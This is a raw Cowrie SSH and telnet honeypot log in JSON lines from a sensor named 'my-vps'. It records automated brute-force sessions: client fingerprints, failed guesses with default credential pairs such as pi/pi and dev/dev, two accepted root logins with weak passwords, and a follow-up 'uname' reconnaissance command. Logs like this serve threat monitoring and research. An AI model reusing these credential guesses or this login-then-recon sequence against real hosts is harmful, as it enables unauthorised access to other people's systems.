{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:07:04.930694Z","src_ip":"212.227.235.229","session":"34648ff6a29f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T06:07:05.365524Z","src_ip":"212.227.235.229","session":"34648ff6a29f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:06.511872Z","src_ip":"212.227.235.229","session":"34648ff6a29f"}
{"eventid":"cowrie.session.closed","duration":31.358745098114014,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:12.018514Z","src_ip":"212.227.235.229","session":"24640f228421"}
{"eventid":"cowrie.session.closed","duration":31.98580503463745,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:15.154416Z","src_ip":"212.227.235.229","session":"34689ea590de"}
{"eventid":"cowrie.session.closed","duration":30.485141277313232,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.137064Z","src_ip":"8.222.212.69","session":"1f07a774024f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60834,"dst_ip":"1.2.3.4","dst_port":22,"session":"95ca5dc95896","protocol":"ssh","message":"New connection: 212.227.125.160:60834 (1.2.3.4:22) [session: 95ca5dc95896]","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.469200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.473569Z","src_ip":"212.227.125.160","session":"95ca5dc95896"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53742,"dst_ip":"1.2.3.4","dst_port":22,"session":"e819fee228ee","protocol":"ssh","message":"New connection: 212.227.235.229:53742 (1.2.3.4:22) [session: e819fee228ee]","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.571701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.572805Z","src_ip":"212.227.235.229","session":"e819fee228ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.576171Z","src_ip":"212.227.125.160","session":"95ca5dc95896"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.715638Z","src_ip":"212.227.235.229","session":"e819fee228ee"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T06:07:19.987471Z","src_ip":"212.227.125.160","session":"95ca5dc95896"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T06:07:20.144798Z","src_ip":"212.227.235.229","session":"e819fee228ee"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:21.096593Z","src_ip":"212.227.125.160","session":"95ca5dc95896"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:21.289092Z","src_ip":"212.227.235.229","session":"e819fee228ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33302,"dst_ip":"1.2.3.4","dst_port":22,"session":"b03ad17f4b86","protocol":"ssh","message":"New connection: 212.227.235.229:33302 (1.2.3.4:22) [session: b03ad17f4b86]","sensor":"my-vps","timestamp":"2025-08-28T06:07:34.419828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:07:34.420817Z","src_ip":"212.227.235.229","session":"b03ad17f4b86"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:07:34.565759Z","src_ip":"212.227.235.229","session":"b03ad17f4b86"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-28T06:07:34.999515Z","src_ip":"212.227.235.229","session":"b03ad17f4b86"}
{"eventid":"cowrie.session.closed","duration":31.655229091644287,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:35.091816Z","src_ip":"212.227.235.229","session":"0ca620097cb4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:36.153787Z","src_ip":"212.227.235.229","session":"b03ad17f4b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50256,"dst_ip":"1.2.3.4","dst_port":22,"session":"93536a25f35e","protocol":"ssh","message":"New connection: 212.227.235.229:50256 (1.2.3.4:22) [session: 93536a25f35e]","sensor":"my-vps","timestamp":"2025-08-28T06:07:49.580121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:07:49.580795Z","src_ip":"212.227.235.229","session":"93536a25f35e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:07:49.723949Z","src_ip":"212.227.235.229","session":"93536a25f35e"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T06:07:50.155702Z","src_ip":"212.227.235.229","session":"93536a25f35e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:51.301843Z","src_ip":"212.227.235.229","session":"93536a25f35e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56944,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a7ababc41fc","protocol":"ssh","message":"New connection: 212.227.125.160:56944 (1.2.3.4:22) [session: 9a7ababc41fc]","sensor":"my-vps","timestamp":"2025-08-28T06:07:57.357139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:07:57.469883Z","src_ip":"212.227.125.160","session":"9a7ababc41fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:07:57.572788Z","src_ip":"212.227.125.160","session":"9a7ababc41fc"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T06:07:57.885884Z","src_ip":"212.227.125.160","session":"9a7ababc41fc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:07:58.991606Z","src_ip":"212.227.125.160","session":"9a7ababc41fc"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":40868,"dst_ip":"1.2.3.4","dst_port":23,"session":"db3dec92e366","protocol":"telnet","message":"New connection: 8.222.212.69:40868 (1.2.3.4:23) [session: db3dec92e366]","sensor":"my-vps","timestamp":"2025-08-28T06:08:01.550990Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51910,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c6e77488737","protocol":"ssh","message":"New connection: 212.227.235.229:51910 (1.2.3.4:22) [session: 0c6e77488737]","sensor":"my-vps","timestamp":"2025-08-28T06:08:07.472765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:07.473666Z","src_ip":"212.227.235.229","session":"0c6e77488737"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:08:07.617613Z","src_ip":"212.227.235.229","session":"0c6e77488737"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:08:08.052954Z","src_ip":"212.227.235.229","session":"0c6e77488737"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:08:08.432675Z","src_ip":"212.227.235.229","session":"0c6e77488737"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:08:08.433364Z","src_ip":"212.227.235.229","session":"0c6e77488737"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:08.582871Z","src_ip":"212.227.235.229","session":"0c6e77488737"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:08.584006Z","src_ip":"212.227.235.229","session":"0c6e77488737"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37818,"dst_ip":"1.2.3.4","dst_port":22,"session":"10aa667a63f3","protocol":"ssh","message":"New connection: 212.227.125.160:37818 (1.2.3.4:22) [session: 10aa667a63f3]","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.069087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.070168Z","src_ip":"212.227.125.160","session":"10aa667a63f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.173513Z","src_ip":"212.227.125.160","session":"10aa667a63f3"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.592437Z","src_ip":"212.227.125.160","session":"10aa667a63f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:08:13.877190Z","src_ip":"212.227.125.160","session":"10aa667a63f3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.877876Z","src_ip":"212.227.125.160","session":"10aa667a63f3"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.128.11","src_port":63494,"dst_ip":"1.2.3.4","dst_port":22,"session":"53277bff4c71","protocol":"ssh","message":"New connection: 172.105.128.11:63494 (1.2.3.4:22) [session: 53277bff4c71]","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.879273Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.982538Z","src_ip":"212.227.125.160","session":"10aa667a63f3"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.983607Z","src_ip":"212.227.125.160","session":"10aa667a63f3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.996028Z","src_ip":"172.105.128.11","session":"53277bff4c71"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:08:13.996911Z","src_ip":"172.105.128.11","session":"53277bff4c71"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:08:14.524817Z","src_ip":"172.105.128.11","session":"53277bff4c71"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.128.11","src_port":63510,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef6599cb273b","protocol":"ssh","message":"New connection: 172.105.128.11:63510 (1.2.3.4:22) [session: ef6599cb273b]","sensor":"my-vps","timestamp":"2025-08-28T06:08:14.618164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:08:14.778964Z","src_ip":"172.105.128.11","session":"ef6599cb273b"}
